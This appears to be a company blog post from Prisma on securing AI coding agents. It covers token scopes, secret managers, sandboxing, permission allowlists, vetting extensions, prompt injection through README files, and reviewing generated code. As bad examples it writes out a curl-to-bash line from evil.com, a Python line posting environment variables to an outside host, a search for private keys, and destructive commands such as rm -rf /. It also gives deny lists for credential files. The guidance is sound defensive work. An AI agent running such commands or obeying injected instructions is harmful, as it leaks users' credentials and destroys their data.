How to use AI coding tools safely and responsibly

AI coding assistants now sit at the same keyboard you do. They can read your filesystem, install dependencies, push to remotes, hit production APIs, and execute whatever shell command you let them. They run with your permissions — which means anything you can do, they can do, including things you would never deliberately do.

This post is the security baseline we've settled on at Prisma. It's organized by risk: what can go wrong, what a real failure looks like, and the smallest change that prevents it. The recommendations apply to Claude Code, Cursor, Copilot, Windsurf, Zed, and any other agent that operates with your local permissions.

If a section doesn't apply to your setup, skip it. If you only have time for one thing, jump to the quick reference at the end.

AI agent security overview

MCP servers and token security

MCP (Model Context Protocol) servers connect AI assistants to external services — Slack, databases, GitHub, cloud APIs. The tokens you configure grant the AI the same access as the token holder.

Bad example: a GitHub MCP server configured with a Personal Access Token that has repo, admin:org, and delete_repo scopes. The agent could delete repositories, push directly to main, or read every private repo across the organization.

What to do

Default to read-only tokens. Most agent work doesn't need write access.
When write access is needed, use short-lived tokens — never permanent RW credentials. Revoke as soon as the task is done.
Create dedicated service accounts with minimal scopes. Don't reuse your personal admin token.
Avoid long-lived tokens in general. Rotate frequently; prefer tokens with automatic expiry.
Audit your MCP servers quarterly — which ones are connected, and what scopes their tokens carry.
Prefer OAuth with limited scopes and automatic rotation, where the service supports it.

Recommended token scopes

MCP server	Recommended scope	Avoid
GitHub	`repo:read`, `issues:read`	`admin:org`, `delete_repo`, `repo` (full)
Database	Read-only connection string	Admin/write credentials to production
Cloud APIs (AWS, GCP, Vultr, etc.)	Scoped IAM role with read-only policies	Admin or `:` policies
Linear / Notion / Jira	Read + comment access	Workspace admin tokens

Secrets management

.env files, environment variables, and config files containing secrets are fully readable by AI agents.

Bad example: an .env file contains DATABASE_URL=postgres://admin:password@prisma-data.net:5432/app. The agent reads it during codebase exploration, includes the connection string in a log statement or error message, and leaks production database credentials.

What to do

Use read-only API tokens in local .env files — never admin or read-write credentials.
Add .env to .gitignore and to agent ignore files (.claude/settings.json deny patterns, .cursorignore, .github/copilot-ignore).
Don't store production credentials in plaintext files agents can read.
Use a secret manager — Doppler CLI, 1Password CLI, or similar — instead of plaintext .env files.
Use short-lived tokens for write access and revoke them immediately after.
Separate local-dev credentials from production ones.

Here's what swapping .env for a secret manager looks like in practice, using Doppler as an example. The same pattern works for 1Password CLI:

brew install doppler-cli # macOS
doppler login
doppler setup --project your_project_name --config your_config_name

Then instruct your agent (e.g. via AGENTS.md) to launch your app through the secret manager rather than reading .env:

doppler run -- npm start

To stop agents reading secret files even when they're around, add deny patterns to .claude/settings.json:

{
  "deny": [
    "Read(.env*)",
    "Read(.ssh*)",
    "Read(*.pem)",
    "Read(*credentials*)",
    "Read(*secret*)",
    "Read(~/.claude/settings.json)"
  ]
}

Cursor users can do the same with a .cursorignore file in the project root:

.env
.env.*
.ssh/
*.pem
*.key
**/credentials/**
**/secrets/**

Filesystem isolation

Agents have full read/write access to your filesystem by default. They can read SSH keys, cloud credentials, browser data, and any file your user account can access.

Bad example: an agent runs find / -name "*.pem" -o -name "id_rsa" and reads your SSH private keys, ~/.aws/credentials, or browser cookie databases. These are then included in context or transmitted via an MCP server.

Isolation options

Method	Platform	How it works	Effort
Claude Code `/sandbox` (Seatbelt)	macOS	Native OS-level sandbox. Restricts filesystem writes to the project directory and controls network access via a domain-level proxy. Run `/sandbox` in Claude Code to enable. Works out of the box.	Low
Claude Code `/sandbox` (bubblewrap)	Linux / WSL2	Namespace-based sandbox using bubblewrap + socat. Same filesystem and network isolation as macOS. Requires `apt install bubblewrap socat`.	Low
Docker	All platforms	Run the agent inside a container with only the project directory volume-mounted.	Medium
Claude Code on the web	Any (browser)	Runs in a fully isolated remote sandbox — no access to local files or credentials.	Low

The /sandbox command is the easiest way to get filesystem and network isolation. It works out of the box on macOS (Seatbelt) and needs only bubblewrap and socat on Linux. All subprocesses — kubectl, terraform, npm — inherit the same OS-level restrictions. See the full sandboxing docs for configuration details.

If you'd rather isolate with Docker, mount only the project directory and cut the network:

docker container run \
  --rm \
  --interactive \
  --tty \
  --volume "$(pwd)":/workspace \
  --workdir /workspace \
  --network none \
  your-dev-image \
  claude

--network none blocks outbound calls from the container. Drop it only if the task actually requires network access.

On Linux, bubblewrap gives you a more lightweight equivalent:

bwrap \
  --ro-bind / / \
  --bind "$(pwd)" "$(pwd)" \
  --dev /dev \
  --proc /proc \
  --tmpfs /tmp \
  --unshare-all \
  --die-with-parent \
  claude --dangerously-skip-permissions

This mounts the entire filesystem read-only except for the project directory. --dangerously-skip-permissions is safe here because the sandbox prevents destructive actions outside the project.

Sandboxed agent architecture

Agent execution risks on macOS

macOS doesn't have a native equivalent to Linux's bubblewrap or namespaces. Agents run shell commands with your full user permissions — access to ~/.ssh, ~/.aws, Keychain, and every user-writable file on the machine.

Bad example: an agent runs curl -s https://evil.com/payload.sh | bash, which installs malware, exfiltrates ~/.ssh and ~/.aws, and accesses Keychain data — all silently, with your permissions.

What to do

Don't use --dangerously-skip-permissions on macOS outside a Docker container or VM.
Review every shell command before approving execution.
Allowlist specific commands in Claude Code's permission system and deny dangerous patterns.
Use Docker isolation (above) or run /sandbox in Claude Code.
For untrusted code, use Claude Code on the web — it runs in a fully isolated remote sandbox.

Claude Code's permission prompt exists for a reason. The few seconds it takes to read a command can prevent catastrophic damage. Treat every bash approval like a sudo confirmation.

Safe long-running tasks and permission management

It's tempting to skip permission prompts for convenience. That's how agents end up running destructive commands without review.

Bad example: allowlisting bash(*) or using --dangerously-skip-permissions without sandboxing. The agent runs rm -rf /, git push --force origin main, or DROP TABLE users — all without prompting.

What to do

Allowlist specific, scoped commands — never blanket patterns.
Don't allowlist destructive commands like rm, git push, or curl with wildcards.
For long-running autonomous tasks, sandbox first, then use --dangerously-skip-permissions inside the sandbox only. That gives the agent autonomy while keeping the blast radius contained.

Safe vs. unsafe allowlist patterns

Safe patterns	Unsafe patterns — never use
`bash(npm test)`	`bash(*)`
`bash(go build ./...)`	`bash(rm *)`
`bash(git diff *)`	`bash(git push *)`
`bash(cat *)`	`bash(curl *)`
`bash(pytest *)`	`bash(docker *)`
`bash(eslint *)`	`bash(sudo *)`

Safely using skills and MCP extensions

Skills and MCP servers are third-party code that runs on your machine with your permissions. A malicious or poorly written extension can read files, make network requests, or execute commands without your knowledge.

Before you install, check

The source. Is it from a trusted organization or verified open-source project?
The code. Any suspicious file operations, network calls to unknown domains, or obfuscated logic?
The permissions. Do you understand what system access it requires, and why?
The URL. Watch for typosquatting (e.g. claud3-code vs. claude-code, mcpp-server vs. mcp-server).
The reputation. GitHub stars, issues, and commit history that look legitimate.
The version. Are you installing a specific version, not latest or main?

Red flags — do not install

Filesystem access beyond the project directory, with no clear justification.
Network requests to unknown or suspicious domains.
Obfuscated or minified code with no readable source available.
Excessive credential or permission requests.
Sparse commit history, no documentation, recently created repository.
Requests to disable security features or skip permission prompts.

What to do

Audit the code before installing.
Pin versions — don't auto-update without reviewing changelogs.
Skip skills from untrusted or unverified sources. When in doubt, don't install it.
Run unfamiliar skills in a sandbox before letting them touch real credentials.
Ask someone with security or infrastructure experience when an extension feels off and you can't articulate why.

Prompt injection attacks

Malicious instructions can hide in code comments, README files, issue descriptions, PR bodies, or API responses. When the agent reads them, it can be tricked into executing actions you never asked for.

Bad example: a dependency's README contains a hidden instruction:

The agent reads the README during codebase exploration and executes the hidden command.

Prompt injection can hide in any source of text the agent reads — code comments and docstrings, markdown files (README, CONTRIBUTING, CHANGELOG), git commit messages, issue and PR descriptions (especially from external contributors), API responses and webhook payloads, database content rendered in templates, and dependency package.json descriptions or post-install scripts.

What to do

Don't auto-execute commands found in untrusted files — READMEs, issues, PRs from external contributors.
Review agent actions carefully when working with external or untrusted codebases.
Use filesystem isolation when exploring unfamiliar repositories.
Be cautious with unknown contributors, forks, and recently created repos.
Cut network access (--network none in Docker) when exploring untrusted code.

If you wouldn't copy-paste a command from a random website into your terminal, don't let your agent do it either. The agent reads text from untrusted sources the same way you do — but it may act on hidden instructions you'd never even notice.

Validating AI-generated code

AI-generated code can contain vulnerabilities, backdoors, or data exfiltration — whether from model mistakes, training-data contamination, or prompt injection that you didn't catch.

Bad example: the agent generates a "logging helper" that silently exfiltrates environment variables:

import requests, os
requests.post("https://log-collector.example.com", json=dict(os.environ))

What to watch for

Unexpected outbound network calls — especially POST requests to unknown URLs.
Base64-encoded strings or obfuscated code segments.
eval(), exec(), Function(), or dynamic code execution.
Hardcoded URLs or IP addresses you don't recognize.
Overly broad file operations (/**, /tmp, home-directory access).
Dependencies added that weren't part of the task requirements.

What to do

Review every line before committing. Treat AI-generated code as untrusted input.
Apply the same review standards as you would to a human contributor's code.
Run static analysis — Semgrep, eslint-plugin-security, gosec, Bandit.
Run tests in CI, not just locally.
Use pre-commit hooks to catch common security issues automatically.

Quick reference card

Category	Do	Don't
MCP tokens	Read-only tokens, dedicated service accounts, minimal scopes	Personal admin tokens, broad scopes, shared credentials
Secrets	Secret managers, agent ignore files, short-lived tokens	Plaintext `.env` with prod creds, reused passwords
Filesystem	Docker / bwrap isolation, project-only mount	Full filesystem access, no sandboxing
macOS	Docker isolation, review every command, permission allowlists	`--dangerously-skip-permissions` without a sandbox
Permissions	Scoped allowlists: `bash(npm test)`, `bash(git diff *)`	`bash()`, `bash(rm )`, `bash(curl *)`
Skills / MCP	Audit code, pin versions, verify source	Auto-update, install from unknown sources
Prompt injection	Sandbox untrusted repos, review agent actions	Auto-execute commands from external files
Generated code	Review all output, static analysis, CI testing	Commit without review, skip code-review gates

Why this matters

These numbers describe the wider landscape the agent is operating in:

12.8 million hardcoded secrets detected in public GitHub commits in 2023 (GitGuardian State of Secrets Sprawl 2024).
742% increase in software supply chain attacks from 2019–2022 (Sonatype State of the Software Supply Chain).
1 in 8 open-source downloads contains a known vulnerability (Snyk State of Open Source Security).
80%+ of codebases contain at least one known open-source vulnerability (Synopsys OSSRA Report).
$4.88M average cost of a data breach in 2024 (IBM Cost of a Data Breach Report).
AI coding assistants can generate insecure code up to 40% of the time when given no explicit security guidance (Stanford / NYU research on Copilot security).

The numbers are from published reports on traditional codebases. The risk surface when an agent also has filesystem and command-execution access is substantially larger.

How to Use AI Safely and Responsibly

MCP servers and token security

What to do

Recommended token scopes

Secrets management

What to do

Filesystem isolation

Isolation options

Agent execution risks on macOS

What to do

Safe long-running tasks and permission management

What to do

Safe vs. unsafe allowlist patterns

Safely using skills and MCP extensions

Before you install, check

Red flags — do not install

What to do

Prompt injection attacks

What to do

Validating AI-generated code

What to watch for

What to do

Quick reference card

Why this matters

Keep reading

Claude Generated 50 Websites Overnight. Prisma Compute Helped Ship Them.

Evaluating Object Storage Providers for Prisma Compute

Build your next app with Prisma

Share this article

Subscribe to our newsletter